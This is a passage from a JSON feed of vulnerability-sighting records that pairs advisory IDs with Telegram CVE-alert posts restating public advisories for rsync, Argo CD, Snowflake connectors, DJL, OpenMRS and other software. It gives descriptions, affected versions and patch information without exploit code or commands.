"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0714", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3368", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: A flaw was found in the rsync daemon which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T18:32:00Z\n\ud83d\udccf Modified: 2025-01-29T09:31:42Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12085\n2. https://access.redhat.com/errata/RHSA-2025:0324\n3. https://access.redhat.com/errata/RHSA-2025:0325\n4. https://access.redhat.com/errata/RHSA-2025:0637\n5. https://access.redhat.com/errata/RHSA-2025:0688\n6. https://access.redhat.com/errata/RHSA-2025:0714\n7. https://access.redhat.com/errata/RHSA-2025:0774\n8. https://access.redhat.com/errata/RHSA-2025:0787\n9. https://access.redhat.com/security/cve/CVE-2024-12085\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n11. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-01-29T10:10:09.000000Z"}, {"uuid": "d592482d-6074-40fb-86e2-7504295834da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0688", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3368", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: A flaw was found in the rsync daemon which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T18:32:00Z\n\ud83d\udccf Modified: 2025-01-29T09:31:42Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12085\n2. https://access.redhat.com/errata/RHSA-2025:0324\n3. https://access.redhat.com/errata/RHSA-2025:0325\n4. https://access.redhat.com/errata/RHSA-2025:0637\n5. https://access.redhat.com/errata/RHSA-2025:0688\n6. https://access.redhat.com/errata/RHSA-2025:0714\n7. https://access.redhat.com/errata/RHSA-2025:0774\n8. https://access.redhat.com/errata/RHSA-2025:0787\n9. https://access.redhat.com/security/cve/CVE-2024-12085\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n11. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-01-29T10:10:09.000000Z"}, {"uuid": "6e928e14-8e81-4900-8d7a-92b89f4295e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47G2-QMH2-749V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3500", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-47g2-qmh2-749v\n\ud83d\udd25 CVSS Score: 5.9 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\n\nA vulnerability was discovered in Argo CD that exposed secret values in error messages and the diff view when an invalid Kubernetes Secret resource was synced from a repository. \n\nThe vulnerability assumes the user has write access to the repository and can exploit it, either intentionally or unintentionally, by committing an invalid Secret to repository and triggering a Sync. Once exploited, any user with read access to Argo CD can view the exposed secret data.\n\n### Patches\nA patch for this vulnerability is available in the following Argo CD versions:\n- v2.13.4\n- v2.12.10\n- v2.11.13\n\n### Workarounds\nThere is no workaround other than upgrading.\n\n### References\nFixed with commit https://github.com/argoproj/argo-cd/commit/6f5537bdf15ddbaa0f27a1a678632ff0743e4107 &amp; https://github.com/argoproj/gitops-engine/commit/7e21b91e9d0f64104c8a661f3f390c5e6d73ddca\n\n\ud83d\udccf Published: 2025-01-30T17:52:45Z\n\ud83d\udccf Modified: 2025-01-30T17:52:45Z\n\ud83d\udd17 References:\n1. https://github.com/argoproj/argo-cd/security/advisories/GHSA-47g2-qmh2-749v\n2. https://github.com/argoproj/gitops-engine/security/advisories/GHSA-274v-mgcv-cm8j\n3. https://github.com/argoproj/argo-cd/commit/6f5537bdf15ddbaa0f27a1a678632ff0743e4107\n4. https://github.com/argoproj/gitops-engine/commit/7e21b91e9d0f64104c8a661f3f390c5e6d73ddca\n5. https://github.com/argoproj/argo-cd", "creation_timestamp": "2025-01-30T18:12:25.000000Z"}, {"uuid": "a66cf990-c51e-4502-8b0f-f4e917f5f15c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FG8C-FXJ5-QP3X", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3163", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-fg8c-fxj5-qp3x\n\ud83d\udd25 CVSS Score: 5.3 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability exists in OTRS and ((OTRS Community Edition)) that fail to set the HTTP response header X-Content-Type-Options to nosniff. An attacker could exploit this vulnerability by uploading or inserting content that would be treated as a different MIME type than intended. \n\nThis issue affects: \n\n  *  OTRS 7.0.X\n\n  *  OTRS 8.0.X\n  *  OTRS 2023.X\n  *  OTRS 2024.X\n\n  *  ((OTRS)) Community Edition: 6.0.x\n\nProducts based on the ((OTRS)) Community Edition also very likely to be affected\n\ud83d\udccf Published: 2025-01-27T06:30:26Z\n\ud83d\udccf Modified: 2025-01-27T06:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-43445\n2. https://otrs.com/release-notes/otrs-security-advisory-2025-01", "creation_timestamp": "2025-01-27T07:07:53.000000Z"}, {"uuid": "c06197cc-1f00-4e3b-ac96-9f874d6e86b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MJ6J-32RM-JV58", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3162", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-mj6j-32rm-jv58\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The WC Affiliate  WordPress plugin through 2.3.9 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n\ud83d\udccf Published: 2025-01-27T06:30:26Z\n\ud83d\udccf Modified: 2025-01-27T06:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12321\n2. https://wpscan.com/vulnerability/d4c55d30-1c15-41ee-95e0-670891d67684", "creation_timestamp": "2025-01-27T07:07:49.000000Z"}, {"uuid": "26094f2a-0091-402c-a4cc-55cf72c271c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-28RH-GRJQ-98G6", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3149", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-28rh-grjq-98g6\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability classified as problematic has been found in needyamin image_gallery 1.0. This affects the function image_gallery of the file /view.php. The manipulation of the argument username leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udccf Published: 2025-01-27T00:31:33Z\n\ud83d\udccf Modified: 2025-01-27T00:31:33Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0721\n2. https://vuldb.com/?ctiid.293481\n3. https://vuldb.com/?id.293481\n4. https://vuldb.com/?submit.482812\n5. https://www.websecurityinsights.my.id/2025/01/imagegallery-viewphpusername-cross-site.html", "creation_timestamp": "2025-01-27T01:06:53.000000Z"}, {"uuid": "187c3de5-3231-4508-bca2-2b8efa02e2fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PX55-4C85-RGHR", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3145", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-px55-4c85-rghr\n\ud83d\udd25 CVSS Score: 6.1 (CVSS_V3)\n\ud83d\udd39 Description: IBM Common Licensing 9.0 stores user credentials in plain clear text which can be read by a local user.\n\ud83d\udccf Published: 2025-01-26T18:30:32Z\n\ud83d\udccf Modified: 2025-01-26T18:30:32Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2023-50945\n2. https://www.ibm.com/support/pages/node/7161947", "creation_timestamp": "2025-01-26T19:07:26.000000Z"}, {"uuid": "ef482ed9-4d92-4844-a87e-82db6a0213b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H4P8-JFFM-9CCH", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3155", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-h4p8-jffm-9cch\n\ud83d\udd25 CVSS Score: 4.8 (CVSS_V3)\n\ud83d\udd39 Description: IBM Security Directory Integrator 7.2.0 and IBM Security Verify Directory Integrator 10.0.0 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic.\n\ud83d\udccf Published: 2025-01-27T03:30:26Z\n\ud83d\udccf Modified: 2025-01-27T03:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-28771\n2. https://www.ibm.com/support/pages/node/7161444", "creation_timestamp": "2025-01-27T04:07:36.000000Z"}, {"uuid": "e17fc462-928c-470c-9fa7-5d7ccfb837da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MQQQ-H2X3-46FR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14051", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32376\n\ud83d\udd25 CVSS Score: 4.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L)\n\ud83d\udd39 Description: Discourse is an open-source discussion platform. Prior to versions 3.4.3 on the stable branch and 3.5.0.beta3 on the beta branch, the users limit for a DM can be bypassed, thus giving the ability to potentially create a DM with every user from a site in it. This issue has been patched in stable version 3.4.3 and beta version 3.5.0.beta3.\n\ud83d\udccf Published: 2025-04-30T14:55:21.473Z\n\ud83d\udccf Modified: 2025-04-30T15:08:52.268Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-mqqq-h2x3-46fr\n2. https://github.com/discourse/discourse/commit/21a7f3162221c393f9bb13721451aa7f237d881a", "creation_timestamp": "2025-04-30T15:13:32.000000Z"}, {"uuid": "69a61183-48de-4e6b-abcc-53a17bfc3d47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0787", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3368", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: A flaw was found in the rsync daemon which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T18:32:00Z\n\ud83d\udccf Modified: 2025-01-29T09:31:42Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12085\n2. https://access.redhat.com/errata/RHSA-2025:0324\n3. https://access.redhat.com/errata/RHSA-2025:0325\n4. https://access.redhat.com/errata/RHSA-2025:0637\n5. https://access.redhat.com/errata/RHSA-2025:0688\n6. https://access.redhat.com/errata/RHSA-2025:0714\n7. https://access.redhat.com/errata/RHSA-2025:0774\n8. https://access.redhat.com/errata/RHSA-2025:0787\n9. https://access.redhat.com/security/cve/CVE-2024-12085\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n11. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-01-29T10:10:09.000000Z"}, {"uuid": "ea73c08f-236c-491c-b094-9d6893dd77c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QV35-3GW6-8Q4J", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3374", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-qv35-3gw6-8q4j\n\ud83d\udd25 CVSS Score: 5.1 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\nA malicious registry could return a different digest for a pinned manifest without detection.\n\n### Patches\nThis has been fixed in the v0.7.1 release.\n\n### Workarounds\nAfter running a `regclient.ManifestGet`, the returned digest can be compared to the requested digest.\n\n\ud83d\udccf Published: 2024-08-05T14:46:22Z\n\ud83d\udccf Modified: 2025-01-29T16:57:28Z\n\ud83d\udd17 References:\n1. https://github.com/regclient/regclient/security/advisories/GHSA-qv35-3gw6-8q4j\n2. https://github.com/regclient/regclient/commit/7d17cff26c22196b5ddd66bda8c5ee4abf3d1269\n3. https://github.com/regclient/regclient\n4. https://pkg.go.dev/vuln/GO-2024-3038", "creation_timestamp": "2025-01-29T17:11:09.000000Z"}, {"uuid": "5a87611b-e3bc-41ee-91ab-d04d68fb39fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33G6-495W-V8J2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3380", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24790\n\ud83d\udd25 CVSS Score: 4.3 (CVSS_V3)\n\ud83d\udd39 Description: ### Issue\nSnowflake discovered and remediated a vulnerability in the Snowflake JDBC Driver. On Linux systems, when temporary credential caching is enabled, the Snowflake JDBC Driver will cache temporary credentials locally in a world-readable file.\n\nThis vulnerability affects versions 3.6.8 through 3.21.0. Snowflake fixed the issue in version 3.22.0.\n\n### Vulnerability Details\nOn Linux, when either EXTERNALBROWSER or USERNAME_PASSWORD_MFA authentication methods are used with temporary credential caching enabled, the Snowflake JDBC Driver will cache temporary credentials in a local file. In the vulnerable versions of the Driver, this file is created with world-readable permissions.\n\n### Solution\nSnowflake released version 3.22.0 of the Snowflake JDBC Driver, which fixes this issue. We recommend users upgrade to version 3.22.0.\n\n### Additional Information\nIf you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).\n\ud83d\udccf Published: 2025-01-29T18:42:07Z\n\ud83d\udccf Modified: 2025-01-29T18:42:07Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/snowflake-jdbc/security/advisories/GHSA-33g6-495w-v8j2\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-24790\n3. https://github.com/snowflakedb/snowflake-jdbc/commit/9e1a5acf12406b16c4780ca013f4c4db48b74b59\n4. https://github.com/snowflakedb/snowflake-jdbc", "creation_timestamp": "2025-01-29T19:11:16.000000Z"}, {"uuid": "074a4b4d-c76a-4673-bc48-614bdc6e5dc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XFHV-WQJ6-RX99", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3379", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24791\n\ud83d\udd25 CVSS Score: 4.3 (CVSS_V3)\n\ud83d\udd39 Description: ### Issue\nSnowflake discovered and remediated a vulnerability in the Snowflake NodeJS Driver. File permissions checks of the temporary credential cache could be bypassed by an attacker with write access to the local cache directory.\n\nThis vulnerability affects versions 1.12.0 through 2.0.1 on Linux. Snowflake fixed the issue in version 2.0.2.\n\n### Vulnerability Details\nOn Linux, when either EXTERNALBROWSER or USERNAME_PASSWORD_MFA authentication methods are used with temporary credential caching enabled, the Snowflake NodeJS Driver will cache temporary credentials in a local file. Due to a bug, the check verifying that the cache file can be accessed only by the user running the Driver always succeeded, but didn\u2019t verify the permissions or the ownership correctly. An attacker with write access to the local cache folder could plant an empty file there and the Driver would use it to store temporary credentials instead of rejecting it due to overly broad permissions.\n\n### Solution\nSnowflake released version 2.0.2 of the Snowflake NodeJS Driver, which fixes this issue. We recommend users upgrade to version 2.0.2.\n\n### Additional Information\nIf you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).\n\ud83d\udccf Published: 2025-01-29T18:42:26Z\n\ud83d\udccf Modified: 2025-01-29T18:42:26Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/snowflake-connector-nodejs/security/advisories/GHSA-xfhv-wqj6-rx99\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-24791\n3. https://github.com/snowflakedb/snowflake-connector-nodejs/commit/89731b3a4d61a75b721d13d4e47a7a3712ffa45f\n4. https://github.com/snowflakedb/snowflake-connector-nodejs", "creation_timestamp": "2025-01-29T19:11:15.000000Z"}, {"uuid": "3fe4e8ac-e035-4918-a2dc-ed2d3c71a150", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M4F6-VCJ4-W5MX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3398", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-m4f6-vcj4-w5mx\n\ud83d\udd25 CVSS Score: 6.7 (CVSS_V3)\n\ud83d\udd39 Description: ### Issue\nSnowflake discovered and remediated a vulnerability in the Snowflake Connector for Python. The OCSP response cache uses pickle as the serialization format, potentially leading to local privilege escalation.\n\nThis vulnerability affects versions 2.7.12 through 3.13.0. Snowflake fixed the issue in version 3.13.1.\n\n### Vulnerability Details\nThe OCSP response cache is saved locally on the machine running the Connector using the pickle serialization format. This can potentially lead to local privilege escalation if an attacker has write access to the OCSP response cache file.\n\n### Solution\nSnowflake released version 3.13.1 of the Snowflake Connector for Python, which fixes this issue. We recommend users upgrade to version 3.13.1.\n\n### Additional Information\nIf you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).\n\ud83d\udccf Published: 2025-01-29T20:50:18Z\n\ud83d\udccf Modified: 2025-01-29T20:50:18Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/snowflake-connector-python/security/advisories/GHSA-m4f6-vcj4-w5mx\n2. https://github.com/snowflakedb/snowflake-connector-python\n3. https://github.com/snowflakedb/snowflake-connector-python/releases/tag/v3.13.1", "creation_timestamp": "2025-01-29T21:11:08.000000Z"}, {"uuid": "aba48987-6b37-4114-816f-8a8f059694ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2VPQ-FH52-J3WV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3397", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-2vpq-fh52-j3wv\n\ud83d\udd25 CVSS Score: 6.9 (CVSS_V3)\n\ud83d\udd39 Description: ### Issue\nSnowflake discovered and remediated a vulnerability in the Snowflake Connector for Python. A function from the snowflake.connector.pandas_tools module is vulnerable to SQL injection.\n\nThis vulnerability affects versions 2.2.5 through 3.13.0. Snowflake fixed the issue in version 3.13.1.\n\n### Vulnerability Details\nA function from the snowflake.connector.pandas_tools module is not sanitizing all of its arguments, and queries using them are not parametrized. An attacker controlling these arguments could achieve SQL injection by passing crafted input. Any SQL executed that way by an attacker would still run in the context of the current session.\n\n### Solution\nSnowflake released version 3.13.1 of the Snowflake Connector for Python, which fixes this issue. We recommend users upgrade to version 3.13.1.\n\n### Additional Information\nIf you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).\n\ud83d\udccf Published: 2025-01-29T20:50:33Z\n\ud83d\udccf Modified: 2025-01-29T20:50:33Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/snowflake-connector-python/security/advisories/GHSA-2vpq-fh52-j3wv\n2. https://github.com/snowflakedb/snowflake-connector-python\n3. https://github.com/snowflakedb/snowflake-connector-python/releases/tag/v3.13.1", "creation_timestamp": "2025-01-29T21:11:07.000000Z"}, {"uuid": "c73b87e6-c7b5-41d0-8a45-19a0f12e6cdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2MQW-RQ5M-8HC8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3396", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-2mqw-rq5m-8hc8\n\ud83d\udd25 CVSS Score: 4.9 (CVSS_V3)\n\ud83d\udd39 Description: ### Issue\nSnowflake discovered and remediated a vulnerability in the Snowflake Connector for .NET in which files downloaded from stages are temporarily placed in a world-readable local directory, making them accessible to unauthorized users on the same machine.\n\nThis vulnerability affects versions 2.0.12 through 4.2.0 on Linux and macOS. Snowflake fixed the issue in version 4.3.0.\n\n### Vulnerability Details\nWhen downloading files from stages, the Snowflake Connector for .NET uses the OS temporary directory to save files before copying them to the destination directory. The files in the temporary directory, which are removed once the write to the destination directory concludes, have world-readable permissions on Linux and macOS. This could allow any user on the local machine to access them during their limited lifetime.\n\n### Solution\nSnowflake released version 4.3.0 of the Snowflake Connector for .NET, which fixes this issue. We recommend users upgrade to version 4.3.0.\n\n### Additional Information\nIf you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).\n\ud83d\udccf Published: 2025-01-29T20:50:55Z\n\ud83d\udccf Modified: 2025-01-29T20:50:56Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/snowflake-connector-net/security/advisories/GHSA-2mqw-rq5m-8hc8\n2. https://github.com/snowflakedb/snowflake-connector-net/commit/89d91e8316ca213c5d184bcf469ed93977a5edf9\n3. https://github.com/snowflakedb/snowflake-connector-net", "creation_timestamp": "2025-01-29T21:11:07.000000Z"}, {"uuid": "0cef13dc-ec74-4b36-8802-8f25cdb6e017", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JCRP-X7W3-FFMG", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3437", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0851\n\ud83d\udd25 CVSS Score: 9.8 (CVSS_V3)\n\ud83d\udd39 Description: ## Summary\n\n[Deep Java Library (DJL)](https://docs.djl.ai/master/index.html) is an open-source, high-level, engine-agnostic Java framework for deep learning. DJL is designed to be easy to get started with and simple to use for Java developers. DJL provides a native Java development experience and functions like any other regular Java library.\n\nDJL provides utilities for extracting tar and zip model archives that are used when loading models for use with DJL. These utilities were found to contain issues that do not protect against absolute path traversal during the extraction process.\n\n## Impact\n\nAn issue exists with DJL's untar and unzip functionalities. Specifically, it is possible to create an archive on a Windows system, and when extracted on a MacOS or Linux system, write artifacts outside the intended destination during the extraction process. The reverse is also true for archives created on MacOS/Linux systems and extracted on Windows systems.\n\nImpacted versions: 0.1.0 - 0.31.0\n\n## Patches\n\nThis issue has been patched in DJL 0.31.1 [1]\n\n## Workarounds\n\nDo not use model archive files from sources you do not trust. You should only use model archives from official sources like the DJL Model Zoo, or models that you have created and packaged yourself.\n\n## References\n\nIf you have any questions or comments about this advisory, we ask that you contact AWS/Amazon Security via our vulnerability reporting page [2] or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.\n\n[1] https://github.com/deepjavalibrary/djl/tree/v0.31.1\n[2] https://aws.amazon.com/security/vulnerability-reporting\n\n\ud83d\udccf Published: 2025-01-29T22:21:33Z\n\ud83d\udccf Modified: 2025-01-30T03:04:44Z\n\ud83d\udd17 References:\n1. https://github.com/deepjavalibrary/djl/security/advisories/GHSA-jcrp-x7w3-ffmg\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-0851\n3. https://github.com/deepjavalibrary/djl/commit/7415cc5f72aae69ea9716a5e4f709af03a77a619\n4. https://aws.amazon.com/security/security-bulletins/AWS-2025-003\n5. https://github.com/deepjavalibrary/djl", "creation_timestamp": "2025-01-30T03:11:33.000000Z"}, {"uuid": "c35ac83e-2b2c-47f5-820a-d20b36332406", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VPXM-CR3R-PJP9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3503", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-vpxm-cr3r-pjp9\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: ### Impact\nWe recently underwent Penetration Testing of OpenMRS by a third-party company. **Vulnerabilities were found, and fixes have been made and released.** We've released security updates that include critical fixes, and so, we strongly recommend upgrading affected modules.\n\n**This notice applies to _all_ OpenMRS instances.** The testers used the OpenMRS v3 Reference Application (O3 RefApp); however, their findings highlighted modules commonly used in older OpenMRS applications, including the O2 RefApp. \n\n## Vulnerability Details\n- The issues uncovered included broken access control (e.g. inappropriate admin access), phishing vulnerability, and stored XSS (e.g. vulnerable passwords).\n- No vulnerabilities were found in the O3 frontend esm modules. \n- The Letter of Attestation from the penetration test is [available here](https://drive.google.com/file/d/1sBm4-FzLA8hSoM9wYknBfgEttBHyLvoU/view?usp=sharing) for your reference. \n- After the fixes were applied, the OpenMRS O3 RefApp met a Security Level of \u201cExcellent, Grade A\u201d.\n- The full detailed Remediation Pentest Report is available to Implementation Technical Leads upon request.\n\n### Patches\n**Minimum Requirements for Implementers:** We **strongly** recommend upgrading your modules to the following versions (or greater) as soon as possible. **This is the minimum amount to do and be protected from the vulnerabilities found and fixed.** The following versions contain the patch: \n\n- **Platform** 2.6.11+ \n  - How: Increase your platform version number wherever this is specified in your implementation. If you use the OpenMRS SDK, this will be in the distro.properties file.\n  - Notes: \n    - The newly released [**Platform 2.7**](https://sourceforge.net/projects/openmrs/files/releases/OpenMRS_Platform_2.7.0/) also includes the fixes. [Release Notes and more download options here](https://openmrs.atlassian.net/wiki/x/XoBzEQ).\n    - Platform 2.6.8+ has most of the fixes, but these are broken if you don't use SSL, so Platform 2.6.11 or higher is preferred.\n    - For those still on Platform 2.5+ such as the Bahmni ecosystem, the new [2.5.14](https://ci.openmrs.org/browse/TRUNK-CORE2-232) release includes the patch. _Bahmni note: The upcoming patch release for both Bahmni Lite and Bahmni Standard will incorporate these security fixes._\n- **Legacy UI** OMOD 1.21.0+ ([here](https://addons.openmrs.org/show/org.openmrs.module.legacyui))\n- **ID Gen** OMOD 4.14.0+ ([here](https://addons.openmrs.org/show/org.openmrs.module.idgen))\n- **Address Hierarchy** OMOD 2.19.0+ ([here](https://addons.openmrs.org/show/org.openmrs.module.addresshierarchy))\n- **Attachments** OMOD 3.6.0+ ([here](https://addons.openmrs.org/show/org.openmrs.module.attachments))\n- **Patient Flags** OMOD 3.0.8+ ([here](https://addons.openmrs.org/show/org.openmrs.module.patientflags))\n\n### Workarounds\nThere are no practical workarounds to fix or remediate the vulnerabilities without upgrading. Technically, you could remove the affected OMODs, but this would badly degrade the system's functionality.\n\n## Thank you to our amazing Security contributors!\nThank you to security firm UnderDefense, and to the OpenMRS Security Group contributors for their patch support - specific 